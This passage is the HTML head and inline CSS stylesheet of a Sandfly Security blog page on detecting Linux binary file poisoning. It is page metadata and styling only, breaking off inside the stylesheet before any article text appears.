<!DOCTYPE html><html><head><meta charSet="utf-8"/><meta http-equiv="x-ua-compatible" content="ie=edge"/><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"/><meta name="generator" content="Gatsby 5.3.3"/><meta property="og:title" content="Detecting Linux Binary File Poisoning" data-gatsby-head="true"/><meta name="twitter:title" content="Detecting Linux Binary File Poisoning" data-gatsby-head="true"/><meta name="description" content="Binary poisoning is tampering with a Linux system command and replacing it with a malicious version. Here&amp;#039;s how to find it." data-gatsby-head="true"/><meta property="og:description" content="Binary poisoning is tampering with a Linux system command and replacing it with a malicious version. Here&amp;#039;s how to find it." data-gatsby-head="true"/><meta name="twitter:description" content="Binary poisoning is tampering with a Linux system command and replacing it with a malicious version. Here&amp;#039;s how to find it." data-gatsby-head="true"/><meta name="twitter:site" content="@sandflysecurity" data-gatsby-head="true"/><meta name="twitter:card" content="summary_large_image" data-gatsby-head="true"/><meta property="article:modified_time" content="2021-11-02T17:54:39Z" data-gatsby-head="true"/><meta property="article:published_time" content="2018-06-13T12:00:00Z" data-gatsby-head="true"/><meta property="og:locale" content="en_EN" data-gatsby-head="true"/><meta property="og:type" content="article" data-gatsby-head="true"/><meta property="og:site_name" content="Sandfly Security - Agentless Linux Security and EDR" data-gatsby-head="true"/><meta property="og:image" content="https://www.datocms-assets.com/56687/1658984030-thumbnail-generic.png?w=1000&amp;fit=max&amp;fm=jpg" data-gatsby-head="true"/><meta name="twitter:image" content="https://www.datocms-assets.com/56687/1658984030-thumbnail-generic.png?w=1000&amp;fit=max&amp;fm=jpg" data-gatsby-head="true"/><meta property="og:image:width" content="1280" data-gatsby-head="true"/><meta property="og:image:height" content="720" data-gatsby-head="true"/><meta name="msapplication-square70x70" content="https://www.datocms-assets.com/56687/1657854301-favicon-white-copy-2x.png?w=70&amp;h=70" data-gatsby-head="true"/><meta name="msapplication-square150x150" content="https://www.datocms-assets.com/56687/1657854301-favicon-white-copy-2x.png?w=150&amp;h=150" data-gatsby-head="true"/><meta name="msapplication-square310x310" content="https://www.datocms-assets.com/56687/1657854301-favicon-white-copy-2x.png?w=310&amp;h=310" data-gatsby-head="true"/><meta name="msapplication-square310x150" content="https://www.datocms-assets.com/56687/1657854301-favicon-white-copy-2x.png?w=310&amp;h=150" data-gatsby-head="true"/><meta name="application-name" content="Sandfly Security" data-gatsby-head="true"/><style data-href="/styles.a75c8ea5eb8b5359fa2f.css" data-identity="gatsby-global-css">*{box-sizing:border-box}body{margin:0;overflow-x:hidden}main{display:block}hr{box-sizing:content-box;height:0;overflow:visible}pre{font-family:monospace,monospace;font-size:1em}a{background-color:transparent}abbr[title]{border-bottom:none;text-decoration:underline;-webkit-text-decoration:underline dotted;text-decoration:underline dotted}b,strong{font-weight:bolder}code,kbd,samp{font-family:monospace,monospace;font-size:1em}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sub{bottom:-.25em}sup{top:-.5em}img{border-style:none}form{margin:0}button,input,optgroup,select,textarea{font-family:inherit;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}[type=button],[type=reset],[type=submit],button{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner,button::-moz-focus-inner{border-style:none;padding:0}[type=button]:-moz-focusring,[type=reset]:-moz-focusring,[type=submit]:-moz-focusring,button:-moz-focusring{outline:1px dotted ButtonText}fieldset{padding:.35em .75em .625em}legend{box-sizing:border-box;color:inherit;display:table;max-width:100%;padding:0;white-space:normal}progress{vertical-align:baseline}textarea{overflow:auto}[type=checkbox],[type=radio]{box-sizing:border-box;padding:0}[type=number]::-webkit-inner-spin-button,[type=number]::-webkit-outer-spin-button{height:auto}[type=search]{-webkit-appearance:textfield;outline-offset:-2px}[type=search]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}details{display:block}summary{display:list-item}[hidden],template{display:none}:export{brandBlack:#000;brandWhite:#fff;brandTeal:#21f4db;brandBlue:#91d0ff;brandPurple:#9a94f5;brandSlate:#2b2b2e;brandDarkgray:#c3c4c9;brandLightgray:#e8e9ec;primaryColor:#21f4db;primaryTint20:#4df6e2;primaryTint40:#7af8e9;primaryTint60:#a6fbf1;primaryTint80:#d3fdf8;primaryShade20:#1ec7b3;primaryShade40:#1c9a8b;primaryShade60:#196e64;primaryShade80:#17413c;secondaryTint20:#a7d9ff;secondaryTint40:#bde3ff;secondaryTint60:#d3ecff;secondaryTint80:#e9f6ff;secondaryShade20:#78aad0;secondaryShade40:#5f85a1;secondaryShade60:#465f72;secondaryShade80:#2d3a43;secondaryColor:#91d0ff;tertiaryColor:#9a94f5;accentColor:#21f4db;successColor:#66bb8b;warningColor:#fdb11f;errorColor:#f44336;black:#141414;white:#fff;backgroundColor:#fff;textColor:#2b2b2e;linkColor:#1ec7b3;lightGray:#f6f6f8;darkGray:#c3c4c9;primaryGradient:linear-gradient(135deg,#21f4db 40%,#91d0ff);mediumBreakpoint:700px;xlargeBreakpoint:1200px;xxlargeBreakpoint:1400px}.grecaptcha-badge{visibility:hidden}:root{--layout-sidebar-bg:hsla(0,0%,100%,.9)}.layout__sidebar{-webkit-font-smoothing:antialiased;background-color:var(--layout-sidebar-bg);bottom:0;color:#141414;left:0;position:fixed;right:0;top:0;z-index:15}@supports((-webkit-backdrop-filter:blur(10px)) or (backdrop-filter:blur(10px))){.layout__sidebar{-webkit-backdrop-filter:blur(10px);backdrop-filter:blur(10px);background-color:hsla(0,0%,100%,.9)}}.modal{bottom:0;color:#fff;left:0;position:fixed;right:0;top:0}.modal__loading{inset:0;margin:auto;position:absolute;z-index:-1}.modal__error{background-color:red;border-radius:.5rem;display:inline-block;inset:0;bottom:auto;margin:6rem auto auto;max-width:25rem;padding:1rem;position:absolute;text-align:center}.modal__error p:last-child{margin-bottom:0}.modal__close{align-items:center;background:none;border:0;color:currentColor;display:flex;position:absolute;right:1rem;top:1rem}.headroom{left:0;right:0;top:0;will-change:transform;z-index:20}.headroom-wrapper--sidebar .headroom{position:fixed;transform:translateY(-100%)}.headroom--unfixed{position:relative;transform:none}.layout--transparent-header .headroom--unfixed{position:absolute}.headroom--scrolled{transition:transform .2s ease-in-out,background-color 1ms linear}.headroom--unpinned{position:fixed;transform:translate3d(0,-100%,0)}.headroom--pinned{position:fixed;transform:translateZ(0)}.layout--transparent-header .headroom-wrapper{left:0;position:absolute;right:0;top:0}h2,h3{line-height:1.25;margin-bottom:1.25rem}h2{font-size:2rem;font-weight:600;letter-spacing:-.01em}.ss--accordion{border-top:2px solid #141414;margin:auto;max-width:90rem;position:relative}.ss--accordion button{color:currentColor}.ss--accordion h4{margin:0;text-align:left}@media print,screen and (min-width:64em){.ss--accordion h4{font-size:1.5rem}}.ss--accordion p:last-child{margin:0}.ss--accordion__item{border-bottom:1px solid;padding:1.25rem 0;position:relative}.ss--accordion__content{padding-top:1.25rem}.ss--accordion__header{align-items:center;background:transparent;border:0;display:flex;justify-content:space-between;padding:0 1.25rem 0 0;width:100%}.ss--accordion__icon{align-items:center;border-radius:100%;color:currentColor;display:flex;height:1.875rem;justify-content:center;width:1.875rem}.ss--accordion__icon svg{font-size:.875rem;height:1em;transform:rotate(90deg);width:1em}.ss--block{position:relative}.ss--block--gutters{padding-left:1.25rem;padding-right:1.25rem}@media screen and (min-width:75em){.ss--block--gutters{padding-left:0;padding-right:0}}.ss--block--bg-gray{background-color:#f6f6f8}.ss--block--bg-primary-gradient{background:linear-gradient(135deg,#21f4db 40%,#91d0ff)}.ss--blockquote blockquote{font-size:1.3125rem;margin:0;padding:1.25rem 0}@media screen and (min-width:49.25em){.ss--blockquote blockquote{padding:1.25rem 1.875rem}}.ss--breadcrumbs{font-size:.875rem;margin:0 auto;max-width:73.125rem;padding:1.25rem 1.25rem 0}@media screen and (min-width:75em){.ss--breadcrumbs{padding:1.25rem 0 0}}.ss--breadcrumbs ul{line-height:1}.ss--breadcrumbs a{color:#2b2b2e;text-decoration:none}.ss--breadcrumbs__list{list-style:none;margin:0 0 2.5rem;padding:0}.ss--breadcrumbs__item{display:inline-block;margin:0 0 .3125rem}.ss--breadcrumbs__item:not(:last-child):after{color:rgba(43,43,46,.5);content:"/";display:inline-block;padding:0 .5em}:root{--button-text-color:#fff;--button-bg-color:#141414;--button-bg-active:#3f3f43;--button-bg-hover:#3f3f43;--button-border-color:#2b2b2e}.ss--button{align-items:center;background:var(--button-bg-color);border:0;border-radius:2rem;box-shadow:none;color:var(--button-text-color);cursor:pointer;display:flex;font-size:.875rem;font-weight:600;justify-content:center;line-height:normal;overflow:hidden;padding:.6em 1.5em;position:relative;text-align:center;text-decoration:none;width:100%}@media print,screen and (min-width:43.75em){.ss--button{font-size:1rem;width:-webkit-max-content;width:max-content}}.ss--button:after{background-color:currentColor;content:"";inset:0;opacity:0;position:absolute;transition:background .25s ease,opacity .25s ease}.ss--button:focus:after,.ss--button:hover:after{opacity:.1}.ss--button:active:after{opacity:.2}.ss--button[disabled]{box-shadow:none;opacity:.75;pointer-events:none}.ss--button span{color:var(--button-text-color);pointer-events:none;-webkit-user-select:none;user-select:none}.ss--button__icon{display:block;height:1em;line-height:1;width:1em}.ss--button__icon:first-child{margin-right:.5rem}.ss--button__icon:last-child{margin-left:.5rem}.ss--button--color-secondary{--button-text-color:#141414;--button-bg-color:#91d0ff;--button-bg-active:#68bfff;--button-bg-hover:#78c5ff;--button-border-color:#91d0ff}.ss--button--color-accent{--button-text-color:#141414;--button-bg-color:#21f4db;--button-bg-active:#0be1c8;--button-bg-hover:#0cf0d5;--button-border-color:transparent}.ss--button--color-white{--button-text-color:#141414;--button-bg-color:#fff;--button-bg-active:hsla(0,0%,100%,.08);--button-bg-hover:hsla(0,0%,100%,.05);--button-border-color:#141414}.ss--button--color-black{--button-text-color:#fff;--button-bg-color:#141414;--button-bg-active:hsla(0,0%,8%,.08);--button-bg-hover:hsla(0,0%,8%,.05);--button-border-color:#fff}.ss--button--style-bordered{background:linear-gradient(var(--button-bg-color),var(--button-bg-color)) padding-box,linear-gradient(45deg,#91d0ff,#9a94f5) border-box;border:2px solid transparent}.ss--button--style-unstyled{--button-text-color:var(--button-bg-color);background:none;border:none;box-shadow:none;cursor:pointer;display:inline-block;font-family:inherit;font-size:1rem;margin:0;padding:0;position:relative;text-align:left;width:unset}.ss--button--style-unstyled:focus,.ss--button--style-unstyled:hover{background:none;opacity:.85}.ss--button--style-unstyled:active{background:none}.ss--button--style-unstyled:after{display:none}.ss--button--elevated{box-shadow:0 .2px 2.2px rgba(0,0,0,.02),0 .4px 5.3px rgba(0,0,0,.028),0 .8px 10px rgba(0,0,0,.035),0 1.3px 17.9px rgba(0,0,0,.042),0 2.5px 33.4px rgba(0,0,0,.05),0 6px 80px rgba(0,0,0,.07)}.ss--button--alignment-center{margin:1rem auto 0}.ss--button--width-full{width:100%}@media print,screen and (min-width:43.75em){.ss--button--width-full{max-width:20rem}}.ss--button--menu-item{--button-text-color:currentColor;--button-bg-color:transparent;--button-bg-active:transparent;--button-bg-hover:transparent;background:none;border:0;cursor:pointer;display:inline-block;font-size:1rem;font-weight:400;padding:0;position:relative;text-align:left;text-decoration:none;text-transform:none;width:100%}.ss--button--menu-item:active,.ss--button--menu-item:hover{border:0;opacity:.7}.ss--button--menu-item:active:after,.ss--button--menu-item:hover:after{opacity:0}.ss--button--close{left:1rem;position:absolute;top:1rem}.ss--button--size-large{font-size:1.25rem}.ss--checkbox{display:flex;padding-bottom:1rem}.ss--checkbox input{clip:rect(0,0,0,0)!important;align-items:center;border:0!important;display:flex;height:1px!important;overflow:hidden!important;padding:0!important;position:absolute!important;white-space:nowrap!important;width:1px!important}.ss--checkbox label{align-items:flex-start;display:flex;font-size:1rem;text-align:left}.ss--checkbox label svg{color:#21f4db;cursor:pointer;margin:0 1rem .125rem 0;min-height:1.25rem;min-width:1.25rem}.ss--checkbox [type=checkbox]{display:block;margin-right:1rem;margin-top:.4rem;min-width:.8rem}.ss--checkbox [type=checkbox]::placeholder{opacity:.4}.ss--checkbox__checked{display:flex;position:relative}.ss--checkbox__checked .ss--checkbox__check{bottom:0;left:0;position:absolute;right:0;top:0}.ss--checkbox__checked .ss--checkbox__check svg{color:#141414}.ss--checkbox--error .ss--checkbox__error{color:#f44336}.ss--chip{position:relative}.ss--chip__link.ss--chip__link{border:2px solid;border-radius:1em;color:#1ec7b3;display:inline-block;font-size:.875rem;font-weight:500;line-height:1;padding:.25em .5em}.ss--chip__link.ss--chip__link:active,.ss--chip__link.ss--chip__link:hover{color:#1c9a8b}.ss--chip__link.ss--chip__link[aria-current]{background-color:#1ec7b3}.ss--chip__link.ss--chip__link[aria-current]:active,.ss--chip__link.ss--chip__link[aria-current]:hover{background-color:#1c9a8b}.ss--chip--elevated a{box-shadow:0 .2px 2.2px rgba(0,0,0,.02),0 .4px 5.3px rgba(0,0,0,.028),0 .8px 10px rgba(0,0,0,.035),0 1.3px 17.9px rgba(0,0,0,.042),0 2.5px 33.4px rgba(0,0,0,.05),0 6px 80px rgba(0,0,0,.07)}.ss--chips{align-content:center;display:flex;flex-direction:row;gap:.625rem;overflow-x:scroll;padding:1.25rem}@media screen and (min-width:75em){.ss--chips{flex-wrap:wrap;overflow:hidden}}.ss--content a:not(.ss--button):not(.ss--chip__link){color:#1ec7b3;font-weight:400}.ss--content a:not(.ss--button):not(.ss--chip__link):focus,.ss--content a:not(.ss--button):not(.ss--chip__link):hover{color:#1c9a8b}.ss--content>h1{margin-bottom:2.5rem}.ss--content>h1:last-child,.ss--content>p:last-child{margin-bottom:0}.ss--content ul{margin:0 0 1rem 1.25rem;padding:0}.ss--content li{font-weight:300;line-height:1.5;margin-bottom:.625rem}.ss--content--bg-gray{background-color:#e8e9ec}.ss--content--bg-primary-gradient{background:linear-gradient(135deg,#21f4db 40%,#91d0ff)}.ss--content--text-align-left{text-align:left}.ss--content--text-align-center{text-align:center}.ss--content--text-align-right{text-align:right}.ss--content--vertically-align-center{display:flex;flex-direction:column;justify-content:center}.ss--content--width-large,.ss--content--width-medium,.ss--content--width-small{margin:0 auto}.ss--content--width-small{max-width:48rem}.ss--content--width-medium{max-width:73.125rem}.ss--content--width-large{max-width:90rem}.ss--content--gutters{padding-left:1.25rem;padding-right:1.25rem}@media screen and (min-width:75em){.ss--content--gutters{padding-left:0;padding-right:0}}.ss--content--improved-typography h1,.ss--content--improved-typography h2,.ss--content--improved-typography h3,.ss--content--improved-typography h4{margin-bottom:.75em}.ss--content--improved-typography>h2:not(:first-child){margin-top:2.5rem}.ss--content--improved-typography>p{margin-bottom:1.5625rem}.ss--content--improved-typography>blockquote{border-left:4px solid #21f4db;margin-bottom:2.5rem;margin-left:0;margin-top:2.5rem;padding-bottom:.25rem;padding-left:2.5rem;padding-top:.25rem}.ss--content--improved-typography>blockquote p:last-child{margin-bottom:0}.ss--copyright{align-items:flex-start;display:flex;font-size:.875rem;justify-content:space-between;padding:2.5rem 0 0;text-align:center}@media screen and (min-width:75em){.ss--copyright{text-align:left}}.ss--copyright p{margin-bottom:0}.ss--copyright__link.ss--copyright__link{max-width:400px;text-decoration:underline}.ss--copyright__veracode{display:block;text-align:center}.ss--copyright__veracode>div{margin:.5rem auto}.ss--cta{display:grid;overflow:hidden;position:relative;text-align:center;width:100%}@media screen and (min-width:75em){.ss--cta{padding-left:0;padding-right:0}}.ss--cta h1{font-size:2.625rem;margin-bottom:1.25rem}.ss--cta p{font-size:1.25rem;font-weight:400;margin-bottom:1.6625rem}.ss--cta__image.ss--cta__image{inset:0;object-fit:cover;object-position:50% 50%;position:absolute}.ss--cta__content{position:relative;z-index:3}.ss--cta__logos{padding-bottom:2rem}.ss--cta--color-accent,.ss--cta--color-primary,.ss--cta--color-secondary{color:#fff}.ss--cta--color-primary{background-color:#21f4db}.ss--cta--color-secondary{background-color:#91d0ff}.ss--cta--color-accent{background-color:#21f4db}.ss--cta--color-primaryGradient{background-color:#33a49b;background-image:linear-gradient(135deg,#21f4db 40%,#91d0ff);background-position:50%;background-repeat:no-repeat;background-size:cover;color:#2b2b2e}.ss--cta--variant-hero{background-color:#141414;background-image:radial-gradient(circle at 85%,#21f4db 0,rgba(33,244,219,.05) 50%,rgba(33,244,219,0) 100%);color:#fff}.ss--cta--variant-hero svg{color:#141414}.ss--cta--variant-hero .ss--cta__content{padding:15rem 1.25rem 11.25rem}@media print,screen and (min-width:64em){.ss--cta--variant-hero .ss--cta__content{text-align:left;width:40%}}@media screen and (min-width:75em){.ss--cta--variant-hero .ss--cta__content{padding:20rem 1.25rem 15rem 0}}@media print,screen and (min-width:64em){.ss--cta--variant-hero .ss--cta__content>a{margin-left:0}}.ss--cta--variant-hero .ss--cta__sizer{margin:auto;max-width:73.125rem;width:100%}.ss--cta--variant-default .ss--cta__content{padding:5rem 1.25rem}.ss--disclaimer p{font-size:.875rem;margin-bottom:0}.ss--drill-down{font-size:1.125rem;margin-top:4.125rem}.ss--drill-down__child,.ss--drill-down__list{list-style-type:none;margin:0;padding:0 1.25rem}.ss--drill-down__child li:not(:last-child):not(.ss--drill-down__subheading):after,.ss--drill-down__list li:not(:last-child):not(.ss--drill-down__subheading):after{background-color:#fff;content:"";display:block;height:1px;opacity:.5;width:100%}.ss--drill-down__subheading h4{padding-top:.75rem;text-transform:uppercase}.ss--drop-down{color:#2b2b2e;position:absolute;top:3.125rem;width:17.5rem}.ss--drop-down__list{background-color:#fff;border-radius:0 0 .25rem .25rem;box-shadow:0 2.8px 2.2px rgba(0,0,0,.02),0 6.7px 5.3px rgba(0,0,0,.028),0 12.5px 10px rgba(0,0,0,.035),0 22.3px 17.9px rgba(0,0,0,.042),0 41.8px 33.4px rgba(0,0,0,.05),0 100px 80px rgba(0,0,0,.07);color:#2b2b2e;list-style:none;margin:0;padding:0 1.25rem;transition:background-color .3s linear}.ss--drop-down--closed{pointer-events:none}.ss--drop-down--open{position:absolute}.headroom--unpinned .ss--drop-down--open{opacity:0;pointer-events:none}.ss--title-with-icon{display:flex;gap:.625rem}.ss--title-with-icon h3{width:100%}.ss--title-with-icon svg{color:#21f4db;font-size:1.575rem;height:1em;margin-bottom:1rem;width:1em}.ss--figure figure{margin:0 0 1.25rem}.ss--figure figcaption{color:#c3c4c9;font-style:italic;text-align:center}.ss--footer{background-color:#141414;color:#fff}.ss--footer a{color:currentColor;font-weight:600;text-decoration:none}.ss--footer a:visited{color:inherit}.ss--footer a:hover{opacity:.8}.ss--footer svg{color:#21f4db;font-size:1.25rem;margin-right:.625rem}.ss--footer ul{font-size:.875rem;list-style-type:none;margin:0;padding:1.25rem 0 0}.ss--footer li:not(:last-of-type),.ss--footer li:not(:only-of-type){margin-bottom:.625rem}.ss--footer__container{margin:0 auto;max-width:73.125rem;padding:1.25rem}@media screen and (min-width:75em){.ss--footer__container{padding:1.25rem 0}}.ss--footer__wrapper{display:flex;flex-direction:column-reverse;flex-wrap:wrap;gap:2.5rem}@media print,screen and (min-width:43.75em){.ss--footer__wrapper{flex-direction:row}}@media screen and (min-width:75em){.ss--footer__wrapper{display:grid;grid-template-columns:repeat(4,1fr)}}.ss--footer__menu{padding-bottom:2.5rem}@media screen and (min-width:75em){.ss--footer__menu{padding-bottom:0}}.ss--footer__menu:first-of-type{grid-row:1/2}.ss--footer__menu:last-of-type{grid-row:2/3}.ss--footer__menu:last-of-type svg{font-size:2rem}@media screen and (min-width:75em){.ss--footer__menu:not(:first-of-type):not(:last-of-type){grid-row:1/3}}.ss--footer__menu a[aria-current]{color:#21f4db}.ss--footer__menu button,.ss--footer__menu form{font-size:.875rem}.ss--footer__menu form{padding-top:1.25rem}.ss--footer__menu form input{height:auto}.ss--footer__menu-heading:after{background-color:#fff;content:"";display:block;height:1px;opacity:.5;top:1.25rem;width:100%}.ss--footer__social{display:flex}.ss--form button{margin-top:.3125rem}.ss--form fieldset{border:none;margin:0;padding:0}.ss--form__statement{text-align:left}.ss--form__response{padding-bottom:1.25rem}.ss--form__reponse-body{text-align:center}.ss--grid{margin:0 auto;max-width:74.375rem}@media screen and (min-width:75em){.ss--grid{overflow:unset}}.ss--grid__wrapper{display:flex;flex-direction:column;gap:1.25rem}@media print,screen and (min-width:64em){.ss--grid__wrapper{display:grid;gap:2.5rem;grid-template-columns:repeat(2,1fr)}}.ss--grid--gutters{padding-left:1.25rem;padding-right:1.25rem}@media screen and (min-width:75em){.ss--grid--gutters{padding-left:0;padding-right:0}}.ss--grid--nested{margin:0;padding:0}.ss--grid--nested .ss--grid__wrapper{display:grid;gap:1.25rem;grid-template-columns:repeat(2,1fr)}@media print,screen and (min-width:64em){.ss--grid--nested .ss--grid__wrapper{grid-template-columns:repeat(4,1fr)}}.ss--grid--nested .ss--grid__wrapper>div>div{display:flex;justify-content:center}.ss--grid--scroll-mobile{overflow:scroll;padding:0}.ss--grid--scroll-mobile .ss--grid__wrapper{display:inline-flex;gap:1.25rem}@media screen and (min-width:75em){.ss--grid--scroll-mobile .ss--grid__wrapper>div{margin-bottom:0}}.ss--grid--col-1 .ss--grid__wrapper{display:grid;gap:1.25rem;grid-template-columns:repeat(1,1fr)}@media screen and (min-width:75em){.ss--grid--col-3 .ss--grid__wrapper{display:grid;gap:1.25rem;grid-template-columns:repeat(3,1fr)}}@media screen and (min-width:31.25em){.ss--grid--col-4 .ss--grid__wrapper{display:grid;grid-template-columns:repeat(2,1fr)}}@media screen and (min-width:50em){.ss--grid--col-4 .ss--grid__wrapper{display:grid;grid-template-columns:repeat(3,1fr)}}@media print,screen and (min-width:64em){.ss--grid--col-4 .ss--grid__wrapper{display:grid;gap:1.25rem;grid-template-columns:repeat(4,1fr)}}@media screen and (min-width:31.25em){.ss--grid--col-8 .ss--grid__wrapper{display:grid;grid-template-columns:repeat(2,1fr)}}@media screen and (min-width:50em){.ss--grid--col-8 .ss--grid__wrapper{display:grid;grid-template-columns:repeat(4,1fr)}}@media print,screen and (min-width:64em){.ss--grid--col-8 .ss--grid__wrapper{display:grid;gap:1.25rem;grid-template-columns:repeat(8,1fr)}}.ss--grid--gap-large .ss--grid__wrapper{gap:2.5rem}@media print,screen and (max-width:74.99875em){.ss--grid--gap-none-mobile .ss--grid__wrapper{gap:0}.ss--grid--gap-none-mobile .ss--grid__wrapper>div{margin:0}.ss--grid--gap-none-mobile .ss--grid__wrapper ul{margin-bottom:0}}.ss--grid--reverse .ss--grid__wrapper{flex-direction:column-reverse}.ss--grid--justify-center{justify-content:center}:root{--header-bg:#fff;--header-bg-fallback:#fff;--header-color:#2b2b2e}.ss--header{background-color:var(--header-bg-fallback);position:relative;transition:background-color .3s linear;z-index:10}@supports((-webkit-backdrop-filter:blur(10px)) or (backdrop-filter:blur(10px))){.ss--header{-webkit-backdrop-filter:blur(10px);backdrop-filter:blur(10px);background-color:hsla(0,0%,100%,.5)}}.layout--transparent-header .ss--header{-webkit-backdrop-filter:none;backdrop-filter:none;background-color:transparent;box-shadow:none;color:#fff;position:relative}.layout--transparent-header .headroom--pinned .ss--header{background-color:hsla(0,0%,100%,.5);box-shadow:0 2.8px 2.2px rgba(0,0,0,.02),0 6.7px 5.3px rgba(0,0,0,.028),0 12.5px 10px rgba(0,0,0,.035),0 22.3px 17.9px rgba(0,0,0,.042),0 41.8px 33.4px rgba(0,0,0,.05),0 100px 80px rgba(0,0,0,.07);color:#2b2b2e;transition:background-color .3s linear;z-index:10}@supports((-webkit-backdrop-filter:blur(10px)) or (backdrop-filter:blur(10px))){.layout--transparent-header .headroom--pinned .ss--header{-webkit-backdrop-filter:blur(10px);backdrop-filter:blur(10px);background-color:hsla(0,0%,100%,.8)}}.ss--header__container{margin:0 auto;max-width:73.125rem}.ss--header__wrapper{align-items:center;display:flex;flex-wrap:wrap;justify-content:flex-end;padding:.625rem 1.25rem;position:relative}@media screen and (min-width:75em){.ss--header__wrapper{padding:.625rem 0 1.25rem}}.ss--header__top .ss--header__wrapper{font-size:.75rem;letter-spacing:.1em;padding:.4166666667rem 0;text-transform:uppercase}.ss--header__logo{align-self:center;color:currentColor;line-height:1;margin-right:auto;max-width:9rem;position:relative;z-index:2}.ss--header__logo>:first-child{display:none}@media print,screen and (min-width:43.75em){.ss--header__logo{justify-self:flex-start;max-width:15rem}.ss--header__logo>:first-child{display:inline-block}.ss--header__logo>:last-child{display:none}}@media screen and (min-width:75em){.ss--header__logo{max-width:20rem}}.ss--header__menu{display:none}@media screen and (min-width:75em){.ss--header__menu{display:block;margin-right:0}}.ss--header__cta{display:none}@media screen and (min-width:22.5em){.ss--header__cta{display:flex}}@media screen and (min-width:75em){.ss--header__cta{margin-left:1em}}.ss--header__cta>*{margin:0}.ss--header__icon button,.ss--header__icon span{display:flex}.ss--header__icon button{cursor:pointer}.ss--header__icon rect{fill:currentColor}@media screen and (min-width:75em){.ss--header__icon{display:none}}.ss--header__top{color:currentColor;display:none;transition:color .2s linear}@media screen and (min-width:75em){.ss--header__top{display:block}}.ss--header__link{color:currentColor;font-weight:700;transition:color .25s ease,opacity .25s ease}.ss--header__link:focus,.ss--header__link:hover{opacity:.65}.ss--header__link:not(:first-child){margin-left:1.25rem}.ss--header__link--parent{color:#21f4db}.ss--header__phone{justify-self:start;margin-left:0;margin-right:auto}.ss--hero{background-color:#33a49b;background-image:url(/hero-bg.webp);background-position:50%;background-repeat:no-repeat;background-size:cover;color:#fff;padding:11.25rem 0}.ss--hero p{font-size:1.25rem;font-weight:400}.ss--icon{align-items:center;display:flex;justify-content:center}.ss--image{margin:auto;position:relative;width:100%}.image-with-content .ss--image{align-content:center}.ss--image img{margin-bottom:0}.ss--image__image{background-color:#f6f6f8;border-radius:.5rem;overflow:hidden}.ss--image__logo:not(img){bottom:1.25rem;left:1.25rem;position:absolute}.ss--image__zoom{background:transparent;border:0;bottom:1.25rem;color:#fff;filter:drop-shadow(1px 1px 4px rgba(20,20,20,.5));opacity:0;position:absolute;right:1.25rem;transform:translate(100%,100%);transition:all .25s cubic-bezier(.17,.67,.37,.95)}:hover>.ss--image__zoom{opacity:1;transform:translate(0)}.ss--image--width-small{max-width:48rem}.ss--image--width-medium{max-width:73.125rem}.ss--image--width-large{max-width:90rem}.ss--image--width-full{max-width:unset}.ss--image--width-full .ss--image__wrap>div{border-radius:0}.ss--image--elevated .ss--image__image{box-shadow:0 2.8px 2.2px rgba(0,0,0,.02),0 6.7px 5.3px rgba(0,0,0,.028),0 12.5px 10px rgba(0,0,0,.035),0 22.3px 17.9px rgba(0,0,0,.042),0 41.8px 33.4px rgba(0,0,0,.05),0 100px 80px rgba(0,0,0,.07)}.ss--image--lightbox{position:relative}.ss--image-list{display:grid;gap:16px 16px}.ss--image-list__item>*{border-radius:.25rem}.ss--image-list--logo-grid{grid-auto-rows:1fr;grid-template-columns:repeat(4,1fr);max-width:100%}.ss--image-list--logo-grid-small{align-items:center;display:flex;flex-wrap:wrap;justify-content:center;mix-blend-mode:screen}.ss--image-list--logo-grid-small .ss--image-list__item{align-self:center;filter:invert(1) grayscale(1) brightness(2);justify-self:center;max-width:50px}@media print,screen and (min-width:43.75em){.ss--image-list--logo-grid-small .ss--image-list__item{max-width:none}}.ss--image-list--elevated .ss--image-list__item>*{box-shadow:0 2.8px 2.2px rgba(0,0,0,.02),0 6.7px 5.3px rgba(0,0,0,.028),0 12.5px 10px rgba(0,0,0,.035),0 22.3px 17.9px rgba(0,0,0,.042),0 41.8px 33.4px rgba(0,0,0,.05),0 100px 80px rgba(0,0,0,.07)}.ss--image-with-content{display:flex;flex-direction:column-reverse;gap:1.25rem;margin:0 auto;max-width:73.125rem}@media print,screen and (min-width:64em){.ss--image-with-content{display:grid;gap:2.5rem;grid-template-columns:repeat(2,1fr)}}.ss--image-with-content--gutters{padding-left:1.25rem;padding-right:1.25rem}@media screen and (min-width:75em){.ss--image-with-content--gutters{padding-left:0;padding-right:0}}.ss--image-with-content--image-left>div{grid-row:1/2}.ss--image-with-content--image-left>div:first-of-type{grid-column:2/3}.ss--image-with-content--image-left>div:last-of-type{grid-column:1/2}.ss--input{padding-bottom:1.25rem}.ss--input input{-webkit-appearance:none;appearance:none;border:2px solid;border-radius:.25rem;box-sizing:border-box;display:block;height:2.8125rem;margin-top:.3125rem;padding:.75em 1em;width:100%}.ss--input input::placeholder{opacity:.4}.ss--input label{clip:rect(0,0,0,0)!important;border:0!important;height:1px!important;overflow:hidden!important;padding:0!important;position:absolute!important;white-space:nowrap!important;width:1px!important}.ss--lazy-iframe{background-color:#141414;padding-top:56.25%;position:relative}.ss--lazy-iframe,.ss--lazy-iframe iframe{border-radius:.5rem;overflow:hidden;width:100%}.ss--lazy-iframe iframe{height:100%;left:0;position:absolute;top:0}.ss--lazy-iframe--elevated{box-shadow:0 2.8px 2.2px rgba(0,0,0,.02),0 6.7px 5.3px rgba(0,0,0,.028),0 12.5px 10px rgba(0,0,0,.035),0 22.3px 17.9px rgba(0,0,0,.042),0 41.8px 33.4px rgba(0,0,0,.05),0 100px 80px rgba(0,0,0,.07)}.ss--menu__list{display:flex;list-style:none;margin:0;padding:0}.ss--menu__list .ss--menu__item,.ss--menu__list span{display:flex}.ss--menu__list .ss--menu__item{padding:0}.ss--menu__toggle{background:none;border:0;color:inherit;padding:0}.ss--menu__item{display:inline-block;margin:0;padding:.5em 0}.ss--menu__item--button{background-color:#21f4db;border-radius:2rem;box-shadow:0 .2px 2.2px rgba(0,0,0,.02),0 .4px 5.3px rgba(0,0,0,.028),0 .8px 10px rgba(0,0,0,.035),0 1.3px 17.9px rgba(0,0,0,.042),0 2.5px 33.4px rgba(0,0,0,.05),0 6px 80px rgba(0,0,0,.07);cursor:pointer;margin-left:1em;position:relative;transition:background .25s ease,opacity .25s 